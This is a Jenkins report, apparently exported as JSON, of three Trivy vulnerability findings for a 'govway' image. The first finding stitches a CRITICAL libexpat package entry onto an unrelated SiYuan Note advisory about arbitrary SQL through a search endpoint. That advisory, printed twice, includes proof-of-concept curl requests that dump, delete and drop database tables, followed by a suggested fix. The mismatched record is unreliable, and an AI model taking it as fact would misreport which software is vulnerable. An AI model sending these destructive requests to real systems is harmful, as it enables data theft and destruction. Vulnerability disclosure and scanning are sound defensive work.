{ "_class" : "io.jenkins.plugins.analysis.core.restapi.ReportApi", "issues" : [ { "addedAt" : 0, "authorEmail" : "-", "authorName" : "-", "baseName" : "govway", "category" : "", "columnEnd" : 0, "columnStart" : 0, "commit" : "-", "description" : "", "fileName" : "/linkitaly/govway", "fingerprint" : "FALLBACK-25b388a0", "lineEnd" : 1, "lineStart" : 1, "message" : "CVE-2026-32767: OsPackageVulnerability\u000a\u000aSiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API\u000a\u000aFor additional help see: **Vulnerability CVE-2026-32767**\u000a| Severity | Package | Fixed Version | Link |\u000a| --- | --- | --- | --- |\u000a|CRITICAL|libexpat|2.7.5-r0|[CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)|\u000a\u000a## Summary\u000a\u000aSiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the `/api/search/fullTextSearchBlock` endpoint. When the `method` parameter is set to `2`, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the `Reader` role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database.\u000a\u000aThis is inconsistent with the application's own security model: the dedicated SQL endpoint (`/api/query/sql`) correctly requires both `CheckAdminRole` and `CheckReadonly` middleware, but the search endpoint bypasses these controls entirely.\u000a\u000a## Root Cause Analysis\u000a\u000a### The Vulnerable Endpoint\u000a\u000a**File:** `kernel/api/router.go`, line 188\u000a\u000a```go\u000aginServer.Handle(\"POST\", \"/api/search/fullTextSearchBlock\", model.CheckAuth, fullTextSearchBlock)\u000a```\u000a\u000aThis endpoint only applies `model.CheckAuth`, which permits **any** authenticated role (Administrator, Editor, or Reader).\u000a\u000a### The Properly Protected Endpoint (for comparison)\u000a\u000a**File:** `kernel/api/router.go`, line 177\u000a\u000a```go\u000aginServer.Handle(\"POST\", \"/api/query/sql\", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL)\u000a```\u000a\u000aThis endpoint correctly chains `CheckAdminRole` and `CheckReadonly`, restricting SQL execution to administrators in read-write mode.\u000a\u000a### The Vulnerable Code Path\u000a\u000a**File:** `kernel/api/search.go`, lines 389-411\u000a\u000a```go\u000afunc fullTextSearchBlock(c *gin.Context) {\u000a // ...\u000a page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)\u000a blocks, matchedBlockCount, matchedRootCount, pageCount, docMode :=\u000a model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize)\u000a // ...\u000a}\u000a```\u000a\u000a**File:** `kernel/model/search.go`, lines 1205-1206\u000a\u000a```go\u000acase 2: // SQL\u000a blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize)\u000a```\u000a\u000aWhen `method=2`, the raw `query` string is passed directly to `searchBySQL()`.\u000a\u000a**File:** `kernel/model/search.go`, lines 1460-1462\u000a\u000a```go\u000afunc searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) {\u000a stmt = strings.TrimSpace(stmt)\u000a blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize)\u000a```\u000a\u000a**File:** `kernel/sql/block_query.go`, lines 566-569, 713-714\u000a\u000a```go\u000afunc SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) {\u000a parsedStmt, err := sqlparser.Parse(stmt)\u000a if err != nil {\u000a return selectBlocksRawStmt(stmt, limit) // Falls through to raw execution\u000a }\u000a // ...\u000a}\u000a\u000afunc selectBlocksRawStmt(stmt string, limit int) (ret []*Block) {\u000a rows, err := query(stmt) // Executes arbitrary SQL\u000a // ...\u000a}\u000a```\u000a\u000a**File:** `kernel/sql/database.go`, lines 1327-1337\u000a\u000a```go\u000afunc query(query string, args ...interface{}) (*sql.Rows, error) {\u000a // ...\u000a return db.Query(query, args...) // Go's database/sql db.Query — executes ANY SQL\u000a}\u000a```\u000a\u000aGo's `database/sql` `db.Query()` will execute any SQL statement, including `DELETE`, `UPDATE`, `DROP TABLE`, `INSERT`, etc. The returned `*sql.Rows` will simply be empty for non-SELECT statements, but the destructive operation is still executed.\u000a\u000a### Authorization Model\u000a\u000a**File:** `kernel/model/session.go`, lines 201-210\u000a\u000a```go\u000afunc CheckAuth(c *gin.Context) {\u000a // Already authenticated via JWT\u000a if role := GetGinContextRole(c); IsValidRole(role, []Role{\u000a RoleAdministrator,\u000a RoleEditor,\u000a RoleReader, // <-- Reader role passes CheckAuth\u000a }) {\u000a c.Next()\u000a return\u000a }\u000a // ...\u000a}\u000a```\u000a\u000a**File:** `kernel/model/session.go`, lines 380-386\u000a\u000a```go\u000afunc CheckAdminRole(c *gin.Context) {\u000a if IsAdminRoleContext(c) {\u000a c.Next()\u000a } else {\u000a c.AbortWithStatus(http.StatusForbidden) // <-- This check is MISSING on the search endpoint\u000a }\u000a}\u000a```\u000a\u000a## Proof of Concept\u000a\u000a### Prerequisites\u000a- SiYuan instance accessible over the network (e.g., Docker deployment)\u000a- Valid authentication as any user role (including `Reader`)\u000a\u000a### Steps to Reproduce\u000a\u000a1. Authenticate to SiYuan and obtain a valid session cookie or API token.\u000a\u000a2. **Read all data (confidentiality breach):**\u000a```bash\u000acurl -X POST http://:6806/api/search/fullTextSearchBlock \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"method\": 2, \"query\": \"SELECT * FROM blocks LIMIT 100\"}'\u000a```\u000a\u000a3. **Delete all blocks (integrity/availability breach):**\u000a```bash\u000acurl -X POST http://:6806/api/search/fullTextSearchBlock \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"method\": 2, \"query\": \"DELETE FROM blocks\"}'\u000a```\u000a\u000a4. **Drop tables (availability breach):**\u000a```bash\u000acurl -X POST http://:6806/api/search/fullTextSearchBlock \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"method\": 2, \"query\": \"DROP TABLE blocks\"}'\u000a```\u000a\u000a5. **Compare with the properly protected endpoint** (should return HTTP 403 for Reader role):\u000a```bash\u000acurl -X POST http://:6806/api/query/sql \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"stmt\": \"SELECT * FROM blocks LIMIT 10\"}'\u000a```\u000a\u000a### Expected Behavior\u000aThe search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with `/api/query/sql`.\u000a\u000a### Actual Behavior\u000aAny authenticated user (including Reader role) can execute arbitrary SQL including destructive operations.\u000a\u000a## Impact\u000a\u000aIn a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code):\u000a\u000a- **Confidentiality:** A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to.\u000a- **Integrity:** A Reader-role user can modify or delete any data in the database, despite having read-only access by design.\u000a- **Availability:** A Reader-role user can drop tables or corrupt the database, rendering the application unusable.\u000a\u000a## Suggested Fix\u000a\u000aAdd `CheckAdminRole` and `CheckReadonly` middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when `method=2`:\u000a\u000a**Option A — Restrict method=2 to admin (recommended):**\u000a\u000aIn `kernel/api/search.go`, add a role check when `method=2`:\u000a\u000a```go\u000afunc fullTextSearchBlock(c *gin.Context) {\u000a // ...\u000a page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)\u000a\u000a // SQL mode requires admin privileges, consistent with /api/query/sql\u000a if method == 2 && !model.IsAdminRoleContext(c) {\u000a ret.Code = -1\u000a ret.Msg = \"SQL search requires administrator privileges\"\u000a return\u000a }\u000a // ...\u000a}\u000a```\u000a\u000a**Option B — Enforce SELECT-only for non-admin users:**\u000a\u000aValidate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator.\u000a\u000aPackage: libexpat\u000aInstalled Version: 2.7.4-r0\u000aVulnerability CVE-2026-32767\u000aSeverity: CRITICAL\u000aFixed Version: 2.7.5-r0\u000aLink: [CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)", "moduleName" : "", "origin" : "trivy", "originName" : "Trivy Security Scanner", "packageName" : "-", "reference" : "1390", "severity" : "HIGH", "toString" : "govway(1,0): CVE-2026-32767: : CVE-2026-32767: OsPackageVulnerability\u000a\u000aSiYuan: Authorization Bypass Allows Arbitrary SQL Execution via Search API\u000a\u000aFor additional help see: **Vulnerability CVE-2026-32767**\u000a| Severity | Package | Fixed Version | Link |\u000a| --- | --- | --- | --- |\u000a|CRITICAL|libexpat|2.7.5-r0|[CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)|\u000a\u000a## Summary\u000a\u000aSiYuan Note v3.6.0 (and likely prior versions) contains an authorization bypass vulnerability in the `/api/search/fullTextSearchBlock` endpoint. When the `method` parameter is set to `2`, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the `Reader` role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database.\u000a\u000aThis is inconsistent with the application's own security model: the dedicated SQL endpoint (`/api/query/sql`) correctly requires both `CheckAdminRole` and `CheckReadonly` middleware, but the search endpoint bypasses these controls entirely.\u000a\u000a## Root Cause Analysis\u000a\u000a### The Vulnerable Endpoint\u000a\u000a**File:** `kernel/api/router.go`, line 188\u000a\u000a```go\u000aginServer.Handle(\"POST\", \"/api/search/fullTextSearchBlock\", model.CheckAuth, fullTextSearchBlock)\u000a```\u000a\u000aThis endpoint only applies `model.CheckAuth`, which permits **any** authenticated role (Administrator, Editor, or Reader).\u000a\u000a### The Properly Protected Endpoint (for comparison)\u000a\u000a**File:** `kernel/api/router.go`, line 177\u000a\u000a```go\u000aginServer.Handle(\"POST\", \"/api/query/sql\", model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, SQL)\u000a```\u000a\u000aThis endpoint correctly chains `CheckAdminRole` and `CheckReadonly`, restricting SQL execution to administrators in read-write mode.\u000a\u000a### The Vulnerable Code Path\u000a\u000a**File:** `kernel/api/search.go`, lines 389-411\u000a\u000a```go\u000afunc fullTextSearchBlock(c *gin.Context) {\u000a // ...\u000a page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)\u000a blocks, matchedBlockCount, matchedRootCount, pageCount, docMode :=\u000a model.FullTextSearchBlock(query, boxes, paths, types, method, orderBy, groupBy, page, pageSize)\u000a // ...\u000a}\u000a```\u000a\u000a**File:** `kernel/model/search.go`, lines 1205-1206\u000a\u000a```go\u000acase 2: // SQL\u000a blocks, matchedBlockCount, matchedRootCount = searchBySQL(query, beforeLen, page, pageSize)\u000a```\u000a\u000aWhen `method=2`, the raw `query` string is passed directly to `searchBySQL()`.\u000a\u000a**File:** `kernel/model/search.go`, lines 1460-1462\u000a\u000a```go\u000afunc searchBySQL(stmt string, beforeLen, page, pageSize int) (ret []*Block, ...) {\u000a stmt = strings.TrimSpace(stmt)\u000a blocks := sql.SelectBlocksRawStmt(stmt, page, pageSize)\u000a```\u000a\u000a**File:** `kernel/sql/block_query.go`, lines 566-569, 713-714\u000a\u000a```go\u000afunc SelectBlocksRawStmt(stmt string, page, limit int) (ret []*Block) {\u000a parsedStmt, err := sqlparser.Parse(stmt)\u000a if err != nil {\u000a return selectBlocksRawStmt(stmt, limit) // Falls through to raw execution\u000a }\u000a // ...\u000a}\u000a\u000afunc selectBlocksRawStmt(stmt string, limit int) (ret []*Block) {\u000a rows, err := query(stmt) // Executes arbitrary SQL\u000a // ...\u000a}\u000a```\u000a\u000a**File:** `kernel/sql/database.go`, lines 1327-1337\u000a\u000a```go\u000afunc query(query string, args ...interface{}) (*sql.Rows, error) {\u000a // ...\u000a return db.Query(query, args...) // Go's database/sql db.Query — executes ANY SQL\u000a}\u000a```\u000a\u000aGo's `database/sql` `db.Query()` will execute any SQL statement, including `DELETE`, `UPDATE`, `DROP TABLE`, `INSERT`, etc. The returned `*sql.Rows` will simply be empty for non-SELECT statements, but the destructive operation is still executed.\u000a\u000a### Authorization Model\u000a\u000a**File:** `kernel/model/session.go`, lines 201-210\u000a\u000a```go\u000afunc CheckAuth(c *gin.Context) {\u000a // Already authenticated via JWT\u000a if role := GetGinContextRole(c); IsValidRole(role, []Role{\u000a RoleAdministrator,\u000a RoleEditor,\u000a RoleReader, // <-- Reader role passes CheckAuth\u000a }) {\u000a c.Next()\u000a return\u000a }\u000a // ...\u000a}\u000a```\u000a\u000a**File:** `kernel/model/session.go`, lines 380-386\u000a\u000a```go\u000afunc CheckAdminRole(c *gin.Context) {\u000a if IsAdminRoleContext(c) {\u000a c.Next()\u000a } else {\u000a c.AbortWithStatus(http.StatusForbidden) // <-- This check is MISSING on the search endpoint\u000a }\u000a}\u000a```\u000a\u000a## Proof of Concept\u000a\u000a### Prerequisites\u000a- SiYuan instance accessible over the network (e.g., Docker deployment)\u000a- Valid authentication as any user role (including `Reader`)\u000a\u000a### Steps to Reproduce\u000a\u000a1. Authenticate to SiYuan and obtain a valid session cookie or API token.\u000a\u000a2. **Read all data (confidentiality breach):**\u000a```bash\u000acurl -X POST http://:6806/api/search/fullTextSearchBlock \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"method\": 2, \"query\": \"SELECT * FROM blocks LIMIT 100\"}'\u000a```\u000a\u000a3. **Delete all blocks (integrity/availability breach):**\u000a```bash\u000acurl -X POST http://:6806/api/search/fullTextSearchBlock \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"method\": 2, \"query\": \"DELETE FROM blocks\"}'\u000a```\u000a\u000a4. **Drop tables (availability breach):**\u000a```bash\u000acurl -X POST http://:6806/api/search/fullTextSearchBlock \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"method\": 2, \"query\": \"DROP TABLE blocks\"}'\u000a```\u000a\u000a5. **Compare with the properly protected endpoint** (should return HTTP 403 for Reader role):\u000a```bash\u000acurl -X POST http://:6806/api/query/sql \\\u000a -H \"Content-Type: application/json\" \\\u000a -H \"Authorization: Token \" \\\u000a -d '{\"stmt\": \"SELECT * FROM blocks LIMIT 10\"}'\u000a```\u000a\u000a### Expected Behavior\u000aThe search endpoint should reject SQL execution for non-admin users, or at minimum enforce read-only access, consistent with `/api/query/sql`.\u000a\u000a### Actual Behavior\u000aAny authenticated user (including Reader role) can execute arbitrary SQL including destructive operations.\u000a\u000a## Impact\u000a\u000aIn a multi-user deployment (e.g., Docker with published access, or any network-accessible instance with access authorization code):\u000a\u000a- **Confidentiality:** A Reader-role user can read all data in the SQLite database, including blocks, assets, references, and configuration data they should not have access to.\u000a- **Integrity:** A Reader-role user can modify or delete any data in the database, despite having read-only access by design.\u000a- **Availability:** A Reader-role user can drop tables or corrupt the database, rendering the application unusable.\u000a\u000a## Suggested Fix\u000a\u000aAdd `CheckAdminRole` and `CheckReadonly` middleware to the search endpoint, or add explicit validation that only SELECT statements are accepted when `method=2`:\u000a\u000a**Option A — Restrict method=2 to admin (recommended):**\u000a\u000aIn `kernel/api/search.go`, add a role check when `method=2`:\u000a\u000a```go\u000afunc fullTextSearchBlock(c *gin.Context) {\u000a // ...\u000a page, pageSize, query, paths, boxes, types, method, orderBy, groupBy := parseSearchBlockArgs(arg)\u000a\u000a // SQL mode requires admin privileges, consistent with /api/query/sql\u000a if method == 2 && !model.IsAdminRoleContext(c) {\u000a ret.Code = -1\u000a ret.Msg = \"SQL search requires administrator privileges\"\u000a return\u000a }\u000a // ...\u000a}\u000a```\u000a\u000a**Option B — Enforce SELECT-only for non-admin users:**\u000a\u000aValidate the parsed SQL to ensure only SELECT statements are executed when the user is not an administrator.\u000a\u000aPackage: libexpat\u000aInstalled Version: 2.7.4-r0\u000aVulnerability CVE-2026-32767\u000aSeverity: CRITICAL\u000aFixed Version: 2.7.5-r0\u000aLink: [CVE-2026-32767](https://avd.aquasec.com/nvd/cve-2026-32767)", "type" : "CVE-2026-32767" }, { "addedAt" : 0, "authorEmail" : "-", "authorName" : "-", "baseName" : "govway", "category" : "", "columnEnd" : 0, "columnStart" : 0, "commit" : "-", "description" : "", "fileName" : "/linkitaly/govway", "fingerprint" : "FALLBACK-4b1da1cc", "lineEnd" : 1, "lineStart" : 1, "message" : "CVE-2026-32777: OsPackageVulnerability\u000a\u000alibexpat: libexpat: Denial of Service via infinite loop in DTD content parsing\u000a\u000aFor additional help see: **Vulnerability CVE-2026-32777**\u000a| Severity | Package | Fixed Version | Link |\u000a| --- | --- | --- | --- |\u000a|MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)|\u000a\u000alibexpat before 2.7.5 allows an infinite loop while parsing DTD content.\u000a\u000aPackage: libexpat\u000aInstalled Version: 2.7.4-r0\u000aVulnerability CVE-2026-32777\u000aSeverity: MEDIUM\u000aFixed Version: 2.7.5-r0\u000aLink: [CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)", "moduleName" : "", "origin" : "trivy", "originName" : "Trivy Security Scanner", "packageName" : "-", "reference" : "1390", "severity" : "NORMAL", "toString" : "govway(1,0): CVE-2026-32777: : CVE-2026-32777: OsPackageVulnerability\u000a\u000alibexpat: libexpat: Denial of Service via infinite loop in DTD content parsing\u000a\u000aFor additional help see: **Vulnerability CVE-2026-32777**\u000a| Severity | Package | Fixed Version | Link |\u000a| --- | --- | --- | --- |\u000a|MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)|\u000a\u000alibexpat before 2.7.5 allows an infinite loop while parsing DTD content.\u000a\u000aPackage: libexpat\u000aInstalled Version: 2.7.4-r0\u000aVulnerability CVE-2026-32777\u000aSeverity: MEDIUM\u000aFixed Version: 2.7.5-r0\u000aLink: [CVE-2026-32777](https://avd.aquasec.com/nvd/cve-2026-32777)", "type" : "CVE-2026-32777" }, { "addedAt" : 0, "authorEmail" : "-", "authorName" : "-", "baseName" : "govway", "category" : "", "columnEnd" : 0, "columnStart" : 0, "commit" : "-", "description" : "", "fileName" : "/linkitaly/govway", "fingerprint" : "FALLBACK-4b3a3abd", "lineEnd" : 1, "lineStart" : 1, "message" : "CVE-2026-32778: OsPackageVulnerability\u000a\u000alibexpat: libexpat: Denial of Service via NULL pointer dereference after out-of-memory condition\u000a\u000aFor additional help see: **Vulnerability CVE-2026-32778**\u000a| Severity | Package | Fixed Version | Link |\u000a| --- | --- | --- | --- |\u000a|MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)|\u000a\u000alibexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.\u000a\u000aPackage: libexpat\u000aInstalled Version: 2.7.4-r0\u000aVulnerability CVE-2026-32778\u000aSeverity: MEDIUM\u000aFixed Version: 2.7.5-r0\u000aLink: [CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)", "moduleName" : "", "origin" : "trivy", "originName" : "Trivy Security Scanner", "packageName" : "-", "reference" : "1390", "severity" : "NORMAL", "toString" : "govway(1,0): CVE-2026-32778: : CVE-2026-32778: OsPackageVulnerability\u000a\u000alibexpat: libexpat: Denial of Service via NULL pointer dereference after out-of-memory condition\u000a\u000aFor additional help see: **Vulnerability CVE-2026-32778**\u000a| Severity | Package | Fixed Version | Link |\u000a| --- | --- | --- | --- |\u000a|MEDIUM|libexpat|2.7.5-r0|[CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)|\u000a\u000alibexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.\u000a\u000aPackage: libexpat\u000aInstalled Version: 2.7.4-r0\u000aVulnerability CVE-2026-32778\u000aSeverity: MEDIUM\u000aFixed Version: 2.7.5-r0\u000aLink: [CVE-2026-32778](https://avd.aquasec.com/nvd/cve-2026-32778)", "type" : "CVE-2026-32778" } ], "size" : 3, "toString" : "3 warnings (high: 1, normal: 2)" }